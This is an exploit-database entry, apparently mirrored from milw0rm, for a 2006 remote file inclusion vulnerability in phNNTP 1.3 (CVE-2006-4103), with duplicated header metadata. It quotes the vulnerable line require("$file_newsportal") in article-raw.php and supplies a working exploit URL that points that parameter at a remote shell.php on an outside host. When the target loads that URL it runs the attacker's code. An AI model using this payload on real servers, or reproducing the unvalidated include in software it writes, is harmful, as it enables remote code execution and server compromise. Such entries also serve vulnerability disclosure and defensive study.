phNNTP 1.3 - 'article-raw.php' Remote File Inclusion
| EKU-ID: 10154 | CVE: OSVDB-27856;CVE-2006-4103 | OSVDB-ID: |
| Author: Drago84 | Published: 2006-08-08 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 10154 | CVE: OSVDB-27856;CVE-2006-4103 | OSVDB-ID: |
| Author: Drago84 | Published: 2006-08-08 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
phNNTP v1.3 Remote File Inclusion
CreW: ToxiC
Bug Found By Drago84
Source Code:
http://freshmeat.net/redir/phnntp/16290/url_tgz/phNNTP-v1.3.tar.gz
Problem Is:
require("$file_newsportal");
Page Affect:
article-raw.php
Path:
Declare file_newsportal
ExP:
http://server/Dir_phNNTP/article-raw.php?file_newsportal=http://www.evalsite.com/shell.php?
Greatz: Str0ke
# milw0rm.com [2006-08-08]